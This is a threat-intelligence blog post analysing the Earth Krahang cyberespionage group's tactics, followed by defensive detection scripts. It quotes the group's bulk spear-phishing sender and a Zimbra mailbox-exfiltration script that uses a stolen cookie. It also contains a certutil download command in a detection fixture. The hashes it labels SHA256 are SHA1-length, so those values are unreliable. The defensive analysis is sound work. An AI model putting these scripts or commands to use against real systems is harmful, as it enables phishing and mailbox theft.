Sıla Özeren Hacıoğlu | 6 MIN READ

CREATED ON October 23, 2025

Earth Krahang APT Group: Global Government Cyberespionage Campaigns (2022–2024) and TTP Analysis

The Earth Krahang group has been active since early 2022, primarily targeting government entities across multiple regions, including Southeast Asia, Europe, the Americas, and Africa.
Earth Krahang's operations are characterized by their strategic exploitation of intergovernmental trust. The group has been observed leveraging compromised government infrastructure to launch attacks on other governmental organizations. This includes hosting malicious payloads, proxying attack traffic, and disseminating spear-phishing emails using compromised government email accounts.

Earth Krahang's operations demonstrate a broad and strategic targeting profile. Analysis revealed approximately 70 confirmed victims across 23 countries. Government organizations constitute the primary focus of Earth Krahang. For instance, in one country, the group successfully compromised organizations across 11 different government ministries. Overall, at least 48 government entities were confirmed compromised [1].

In the following sections, we will review the historical and significant campaigns attributed to Earth Krahang group, analyze their tactics, techniques, and procedures (TTPs), and conclude with a section on how Picus simulates Earth Krahang's attacks to help organizations evaluate and strengthen their defensive posture.

History & Major Activities of Earth Krahang Group

  • 2022 - 2024 - Earth Krahang group conducted a two-year cyberespionage operation, infiltrating 70 organizations—predominantly government agencies—across 23 countries.

ATT&CK Mapping (TTPs) of Earth Krahang Group

Tactic: Reconnaissance

T1589.002 Gather Victim Identity Information: Email Addresses

Earth Krahang gathered hundreds of email addresses during reconnaissance. In one incident, they used a compromised government mailbox to send a malicious RAR attachment to 796 addresses within that same agency. The RAR contained an LNK that installed the Xdealer malware and displayed a decoy document about the agency [1].

Tactic: Initial Access

T1190 Exploit Public-Facing Application

Earth Krahang scans public-facing servers aggressively, using recursive searches for folders like .git and .idea, brute-forcing directories, and enumerating subdomains to discover unmaintained or misconfigured assets. They run vulnerability scanners and exploit frameworks such as sqlmap, nuclei, xray, vscan, pocsuite, and wordpressscan to identify weaknesses that grant server access. The group repeatedly abused remote command-execution flaws — notably CVE-2023-32315 (OpenFire) and CVE-2022-21587 (Oracle WADI) [1].

T1199 Trusted Relationship

Earth Krahang exploits trust between governments by compromising government web servers to host backdoors and distributing the download links via spear-phishing emails to other government entities, making the malicious links appear legitimate and potentially bypassing some domain blacklists. The actor leveraged a compromised government email account to send messages to other government entities, using the following subjects in their spear-phishing emails [1]:

  • salary
  • Malaysian Ministry of Defense Circular
  • Malaysian defense minister visits Hungary
  • ICJ public hearings- Guyana vs. Venezuela
  • About Guyana Procurement Proposal for Taiwan <redacted>

They used the following script to send spear‑phishing emails [1]:

import uuid
from exchangelib import Credentials, Configuration, Account, Mailbox, Message, NTLM

# Enter the Exchange server URL, username and password
credentials = Credentials(username=<REDACTED>, password=<REDACTED>)
config = Configuration(server=<REDACTED>, credentials=credentials, auth_type=NTLM)

# Create the Exchange account object
account = Account(primary_smtp_address=<REDACTED>, credentials=credentials, autodiscover=False, config=config)

# One recipient address per line in the (redacted) input file
f = open(<REDACTED>,"r")
lines = f.readlines()
count = 0
for line in lines:
    count += 100
    # Build the email object
    to_recipients = [Mailbox(email_address=line.strip())]
    subject = "Malaysian Ministry of Defense Circular"
    # A per-recipient GUID is appended to the link so each click can be tracked
    guid = str(uuid.uuid1().hex)
    body = "Kyrgyzstan criminals fled to Malaysia, check the details::https://<REDACTED>/data/frontend/hu/index.php?id="+guid
    message = Message(account=account, subject=subject, body=body, to_recipients=to_recipients)
    # Send the email
    message.send()
    content_tz = line.strip()+"   "+body
    print(line.strip()+': email sent successfully')

T1566 Phishing

Earth Krahang also employs spear-phishing emails to target individuals. These emails are designed to deceive recipients into opening attachments or clicking on embedded links, which then trigger the execution of a pre-configured backdoor on the victims' systems. The filenames of these backdoors frequently reference geopolitical topics, reflecting the type of lure favored by the group. Some example files are listed below [1]:

  • "Plan of Action (POA) - TH-VN - TH_Counterdraft_as of Feb 2022.doc.exe"
  • "คำบอกกล่าวคำฟ้อง.rar" (translated as "Notice of complaint.rar")
  • "ร่างสถานะ ครม. รว. ไทย-โรมาเนีย as of 25 Feb 2022.doc.exe" (translated as "Draft Cabinet status of Thailand-Romania as of 25 Feb 2022.doc.exe")
  • "Malaysian defense minister visits Hungary.Malaysian defense minister visits Hungary.exe"
  • "ICJ public hearings- Guyana vs. Venezuela.ICJ public hearings- Guyana vs. Venezuela.exe"
  • "On the visit of Paraguayan Foreign Minister to Turkmenistan.exe"
  • "pay-slip run persal payslip.pay-slip run persal payslip.docx.exe"
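The double-extension ("….doc.exe") and repeated-name ("subject.subject.exe") patterns in the list above are easy to check mechanically at the mail gateway before a user ever sees the attachment. The following Python is an added example written for this post, not code from the Trend Micro report or from Picus. The attachment names it inspects are constructed to mirror the lure patterns listed above, and the extension sets are an assumption a defender would tune to local policy.

```python
# Constructed sample attachment names, modelled on the lure patterns listed in the post
SAMPLE_ATTACHMENTS = [
    "Plan of Action (POA) - TH-VN - TH_Counterdraft_as of Feb 2022.doc.exe",
    "Malaysian defense minister visits Hungary.Malaysian defense minister visits Hungary.exe",
    "ICJ public hearings- Guyana vs. Venezuela.ICJ public hearings- Guyana vs. Venezuela.exe",
    "pay-slip run persal payslip.pay-slip run persal payslip.docx.exe",
    "คำบอกกล่าวคำฟ้อง.rar",
    "Quarterly budget.xlsx",
    "agenda.pdf",
]

# Extension sets are an assumption; tune them to the gateway's own policy
EXECUTABLE_EXTS = {"exe", "scr", "com", "pif", "cpl", "bat", "cmd", "js", "vbs", "hta", "lnk"}
DOCUMENT_EXTS = {"doc", "docx", "xls", "xlsx", "ppt", "pptx", "pdf", "rtf", "txt"}
ARCHIVE_EXTS = {"rar", "zip", "7z", "iso"}
KNOWN_EXTS = EXECUTABLE_EXTS | DOCUMENT_EXTS | ARCHIVE_EXTS

R_EXEC = "executable extension"
R_DOUBLE = "document extension hidden before executable extension"
R_REPEAT = "file name segment repeated"
R_ARCHIVE = "archive attachment: inspect contents for LNK or EXE"


def split_name(name):
    """Split 'a.b.doc.exe' into name segments ['a', 'b'] and trailing known extensions ['doc', 'exe']."""
    parts = name.lower().split(".")
    exts = []
    while len(parts) > 1 and parts[-1] in KNOWN_EXTS:
        exts.insert(0, parts.pop())
    return parts, exts


def analyze_attachment(name):
    """Return the list of reasons a filename looks like a masquerading lure (empty = nothing found)."""
    segments, exts = split_name(name)
    reasons = []
    if not exts:
        return reasons
    if exts[-1] in EXECUTABLE_EXTS:
        reasons.append(R_EXEC)
        # "report.doc.exe": a document extension placed in front of the real one
        if len(exts) >= 2 and exts[-2] in DOCUMENT_EXTS:
            reasons.append(R_DOUBLE)
        # "subject.subject.exe": the same text repeated, which no normal document name has
        if len(segments) >= 2 and len(set(segments)) < len(segments):
            reasons.append(R_REPEAT)
    elif exts[-1] in ARCHIVE_EXTS:
        # The report describes a RAR carrying an LNK, so archives deserve a look inside
        reasons.append(R_ARCHIVE)
    return reasons


def find_suspicious(names):
    """Map each executable-looking attachment name to its reasons; archives are reported separately."""
    return {n: analyze_attachment(n) for n in names if R_EXEC in analyze_attachment(n)}


if __name__ == "__main__":
    for name in SAMPLE_ATTACHMENTS:
        print(f"{name!r}: {analyze_attachment(name) or 'ok'}")
```

The repeated-segment rule works even when the duplicated subject itself contains a dot (the "Guyana vs. Venezuela" lure splits into four segments, two of which repeat), so it generalizes beyond the exact names in the report.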

Tactic: Execution

T1059.006 Command and Scripting Interpreter: Python

A Python script was identified that the Earth Krahang group used to exfiltrate emails from a Zimbra mail server by packaging the victim's mailbox through the server API with a stolen authenticated cookie [1]:

import requests
from tqdm import tqdm

def getFile(email, cookies, times):
    # 'times' is the after: date filter; the recovered excerpt uses it without defining it
    headers = {
        'Host': '',   # left empty in the recovered sample
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/251000 Firefox/102.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
        'Accept-Language': 'en-US,en;q=0.5',
        'Accept-Encoding': 'gzip, deflate',
        'Cookie': "ZM_AUTH_TOKEN="+cookies   # stolen Zimbra session token
    }
    # Zimbra REST export of the whole mailbox as a tgz, filtered by date; the server host is redacted
    url = "https://<REDACTED>/service/home/%s?fmt=tgz&query=after:%s"%(email,times)
    resp = requests.get(url, stream=True, headers=headers,verify=False)
    total = int(resp.headers.get('content-length', 0))
    fname = email
    # Stream the archive to disk with a progress bar
    with open(fname, 'wb') as file, tqdm(
        desc=fname,
        total=total,
        unit='iB',
        unit_scale=True,
        unit_divisor=1024,
    ) as bar:
        for data in resp.iter_content(chunk_size=1024):
            size = file.write(data)
            bar.update(size)
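Both the T1190 scanning behaviour described earlier (recursive probing for .git and .idea folders, scanner user agents such as sqlmap and nuclei) and the Zimbra mailbox export above leave traces in ordinary web server access logs. The following Python is an added example, not code from the Trend Micro report or from Picus: it parses combined-format access log lines, all of them constructed for this example, and surfaces both patterns. The scanner user-agent markers, the probe threshold and the export formats are assumptions a defender would tune.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs, unquote

# Apache/nginx "combined" log format
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample log; hosts and addresses are documentation values, not real infrastructure
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2024:10:01:02 +0000] "GET /.git/config HTTP/1.1" 404 153 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2024:10:01:03 +0000] "GET /app/.git/HEAD HTTP/1.1" 404 153 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2024:10:01:04 +0000] "GET /.idea/workspace.xml HTTP/1.1" 404 153 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2024:10:01:05 +0000] "GET /admin/ HTTP/1.1" 403 199 "-" "Mozilla/5.0"
198.51.100.9 - - [12/Mar/2024:10:02:00 +0000] "GET /index.php?id=1 HTTP/1.1" 200 5120 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"
198.51.100.9 - - [12/Mar/2024:10:02:01 +0000] "GET /login HTTP/1.1" 200 2048 "-" "Nuclei - Open-source project (github.com/projectdiscovery/nuclei)"
192.0.2.44 - - [12/Mar/2024:10:05:00 +0000] "GET /service/home/alice@example.gov?fmt=tgz&query=after:1/1/2023 HTTP/1.1" 200 73400320 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/251000 Firefox/102.0"
10.0.0.5 - - [12/Mar/2024:10:06:00 +0000] "GET /service/home/bob@example.gov?fmt=json HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
10.0.0.8 - - [12/Mar/2024:10:07:00 +0000] "GET /index.html HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

# Developer/config folders the report says the group probes for; extend as needed
SENSITIVE_DIR_RE = re.compile(r"/\.(git|idea|svn|env)(/|$)")
# Substrings of the default user agents of the tools named in the report (assumption: defaults unchanged)
SCANNER_UA_MARKERS = ("sqlmap", "nuclei", "xray", "vscan", "pocsuite", "wpscan")
# Zimbra REST formats that return a whole mailbox as one archive
EXPORT_FORMATS = {"tgz", "zip"}


def parse_log(text):
    """Return one dict per well-formed combined-format line; malformed lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            entries.append(m.groupdict())
    return entries


def find_scanning(entries, probe_threshold=3):
    """Report client IPs that probe sensitive directories repeatedly or present a scanner user agent."""
    probes = defaultdict(int)
    scanner_ips = defaultdict(set)
    for e in entries:
        path = unquote(urlsplit(e["path"]).path)
        if SENSITIVE_DIR_RE.search(path):
            probes[e["ip"]] += 1
        ua = e["ua"].lower()
        for marker in SCANNER_UA_MARKERS:
            if marker in ua:
                scanner_ips[e["ip"]].add(marker)
    findings = {}
    for ip, n in probes.items():
        if n >= probe_threshold:
            findings[ip] = {"sensitive_dir_probes": n}
    for ip, tools in scanner_ips.items():
        findings.setdefault(ip, {})["scanner_tools"] = sorted(tools)
    return findings


def find_mailbox_exports(entries):
    """Flag Zimbra /service/home/<user> requests with fmt=tgz or zip: full-mailbox downloads."""
    hits = []
    for e in entries:
        parts = urlsplit(e["path"])
        if not parts.path.startswith("/service/home/"):
            continue
        q = parse_qs(parts.query)
        fmt = q.get("fmt", [""])[0].lower()
        if fmt in EXPORT_FORMATS:
            hits.append({
                "ip": e["ip"],
                "mailbox": unquote(parts.path[len("/service/home/"):]),
                "fmt": fmt,
                "query": q.get("query", [""])[0],
                "bytes": int(e["size"]) if e["size"].isdigit() else 0,
            })
    return hits


if __name__ == "__main__":
    entries = parse_log(SAMPLE_LOG)
    print("scanning:", find_scanning(entries))
    print("mailbox exports:", find_mailbox_exports(entries))
```

A mailbox export is legitimate when a user does it from their own client, so the useful signal is the combination: an export from an address the user never logs in from, a large response size, or an `after:` query that reaches back years. The scanning rule is deliberately generic (any dot-directory probe), which is the generalization a defender wants; tighten the threshold if the server hosts a real .well-known path that gets hit often.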

Tactic: Persistence

T1133 External Remote Services

The threat actor installs SoftEther VPN on compromised public‑facing servers, using certutil commands to download and install the VPN server binary [1]. By running SoftEther as an external remote service, they establish persistent access to the victim's network. This access lets the actor connect back into the environment to carry out post‑exploitation activity such as lateral movement and data exfiltration [1].

Tactic: Privilege Escalation

T1068 Exploitation for Privilege Escalation

The Earth Krahang group exploited software flaws to perform local privilege escalation. They leveraged CVE-2021-4034 (PwnKit), CVE-2021-22555, and CVE-2016-5195 (Dirty COW) to gain elevated rights on Linux systems [1].

Tactic: Defense Evasion

T1036.005 Masquerading: Match Legitimate Resource Name or Location

Earth Krahang renamed the SoftEther server executable to taskllst.exe, tasklist.exe, or tasklist_32.exe on Windows and to curl on Linux to make it appear as a legitimate system file [1].

T1574.001 Hijack Execution Flow: DLL

Earth Krahang frequently used Cobalt Strike during the initial stage of attacks. They exploited DLL side‑loading — in one case dropping three files: fontsets.exe (SHA256: 97c668912c29b8203a7c3bd7d5d690d5c4e5da53), faultrep.dll (SHA256: a94d0e51df6abbc4a7cfe84e36eb8f38bc011f46), and faultrep.dat. The legitimate fontsets.exe was abused to side‑load the custom shellcode loader faultrep.dll, which decodes embedded shellcode stored in faultrep.dat; that decoded payload is Cobalt Strike [1].

Tactic: Lateral Movement

T1021.001 Remote Services: Remote Desktop Protocol

Earth Krahang configured RDP to move laterally or maintain access by modifying system settings. They set the Windows Registry key "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections" to 0 to enable Remote Desktop connections [1].
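The four Windows-side techniques above (certutil downloads of the SoftEther binary, SoftEther renamed to tasklist.exe or a lookalike, the fontsets.exe/faultrep.dll side-load, and the fDenyTSConnections change) all show up in standard endpoint telemetry. The Python below is an added example, not code from the Trend Micro report or from Picus; it runs simple rules over a handful of constructed Sysmon-style events (process creation, image load, registry value set) and returns the matches. The event field names, the system-directory list and the set of side-loaded DLL names are assumptions, and the URL in the sample command line is a documentation address.

```python
import ntpath

# Where the Windows utilities and DLLs named in the report legitimately live (assumption: default install)
SYSTEM_DIRS = {"c:\\windows\\system32", "c:\\windows\\syswow64"}
# File names the report says the renamed SoftEther binary used; only tasklist.exe is a real system tool
MASQUERADE_NAMES = {"tasklist.exe", "tasklist_32.exe", "taskllst.exe"}
REAL_SYSTEM_NAMES = {"tasklist.exe"}
# DLL names tied to side-loading in the report; a defender would extend this list
SIDELOAD_DLLS = {"faultrep.dll"}
RDP_VALUE_SUFFIX = "\\control\\terminal server\\fdenytsconnections"

# Constructed Sysmon-style events: id 1 = process create, 7 = image load, 13 = registry value set
SAMPLE_EVENTS = [
    {"id": 1, "image": "C:\\Windows\\System32\\certutil.exe",
     "cmdline": "certutil -urlcache -split -f http://203.0.113.10/vpn.bin C:\\Users\\Public\\tasklist.exe"},
    {"id": 1, "image": "C:\\Users\\Public\\tasklist.exe", "cmdline": "tasklist.exe /start"},
    {"id": 1, "image": "C:\\Windows\\System32\\tasklist.exe", "cmdline": "tasklist /v"},
    {"id": 1, "image": "C:\\Windows\\System32\\taskllst.exe", "cmdline": "taskllst.exe"},
    {"id": 7, "image": "C:\\Users\\Public\\fonts\\fontsets.exe", "loaded": "C:\\Users\\Public\\fonts\\faultrep.dll"},
    {"id": 7, "image": "C:\\Windows\\System32\\WerFault.exe", "loaded": "C:\\Windows\\System32\\faultrep.dll"},
    {"id": 13, "image": "C:\\Windows\\regedit.exe",
     "target": "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\fDenyTSConnections",
     "details": "DWORD (0x00000000)"},
    {"id": 13, "image": "C:\\Windows\\regedit.exe",
     "target": "HKLM\\SOFTWARE\\Example\\Setting", "details": "DWORD (0x00000001)"},
]


def in_system_dir(path):
    """True when the file sits directly in one of the trusted system directories."""
    return ntpath.dirname(path).lower() in SYSTEM_DIRS


def triage(events):
    """Run the four rules over the events; return (event index, rule name, path) for each match."""
    findings = []
    for i, ev in enumerate(events):
        image = ev.get("image", "")
        base = ntpath.basename(image).lower()
        if ev["id"] == 1:
            cmd = ev.get("cmdline", "").lower()
            # T1133 section: certutil fetching a remote file into its cache
            if base == "certutil.exe" and "urlcache" in cmd and "http" in cmd:
                findings.append((i, "certutil_download", image))
            # T1036.005: a system-utility name outside System32, or a lookalike name anywhere
            if base in MASQUERADE_NAMES and (base not in REAL_SYSTEM_NAMES or not in_system_dir(image)):
                findings.append((i, "masqueraded_system_utility", image))
        elif ev["id"] == 7:
            # T1574.001: a DLL that normally ships in System32 loaded from somewhere else
            dll = ev.get("loaded", "")
            if ntpath.basename(dll).lower() in SIDELOAD_DLLS and not in_system_dir(dll):
                findings.append((i, "dll_sideload", dll))
        elif ev["id"] == 13:
            # T1021.001: fDenyTSConnections set to 0 enables inbound Remote Desktop
            target = ev.get("target", "").lower()
            if target.endswith(RDP_VALUE_SUFFIX) and "0x00000000" in ev.get("details", ""):
                findings.append((i, "rdp_enabled_via_registry", ev["target"]))
    return findings


if __name__ == "__main__":
    for idx, rule, path in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {rule} -> {path}")
```

The benign decoys in the sample (the real tasklist.exe in System32, WerFault.exe loading the system copy of faultrep.dll, an unrelated registry write) are there to show that each rule keys on location or value, not on the name alone; that is what keeps the false-positive rate workable when the same logic runs over a day of real telemetry.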

How Does Picus Simulate Earth Krahang Attacks?

We also strongly suggest simulating Earth Krahang attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other threat groups within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for Earth Krahang:

Threat ID | Threat Name                                                  | Attack Module
97377     | Earth Krahang Threat Group Campaign Malware Download Threat  | Network Infiltration
55182     | Earth Krahang Threat Group Campaign Malware Email Threat     | Network Infiltration
96617     | Earth Krahang Threat Group Campaign                          | Windows Endpoint

Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.

References

[1] "Earth Krahang Exploits Intergovernmental Trust to Launch Cross-Government Attacks," Trend Micro. Accessed: Oct. 17, 2025. [Online]. Available: https://www.trendmicro.com/en_us/research/24/c/earth-krahang.html